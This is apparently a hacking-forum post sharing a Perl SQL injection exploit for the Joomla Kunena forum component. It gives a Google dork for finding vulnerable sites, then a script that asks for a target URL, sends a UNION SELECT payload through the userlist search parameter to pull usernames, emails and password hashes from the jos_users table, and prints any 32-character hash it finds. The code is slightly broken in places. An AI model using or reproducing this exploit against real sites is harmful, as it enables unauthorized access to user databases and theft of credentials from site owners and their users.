What's new
  • Vulnerabilities With Joomla Kunena


    Premium User
    Premium User
    Hi guys, check out a script for SQL Injection, that script i'll find vulnerabilities w/ joomla kunena

    it's simple, type on google :


    when u find a site, use a script :

    #Google Dork: inurl:index.php?option=com_kunena&
    print "********************************************* \n";
    print "* Joomla Component com_kunena SQL Injection *\n";
    print "* Coded by D35 *\n";
    print "********************************************* \n";
    sleep 1;
    use LWP::UserAgent;
    print "Entre com o alvo --> ";
    chomp(my $target=<STDIN>);
    $code="%25%27%20and%201=2%29%20union%20select%201, %20concat%280x3a,username,0x3a,email,0x3a,0x3a,act ivation%29,concat%280x3a,username,0x3a,email,0x3a, password,0x3a,activation%29,%27Super%20Administrat or%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_us ers--%20;";
    $agent = LWP::UserAgent->new() or die "[!] Error while processing";
    $agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
    $host= $target. "/index.php?option=com_kunena&func=userlist&search=" .$code;
    $ok = $agent->request(HTTP::Request->new(GET=>$host));
    $ok1 = $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
    print "[+] Password aqui --> $1\n$2\n";
    sleep 1;
    print "Não encontrou password\n";
  • Top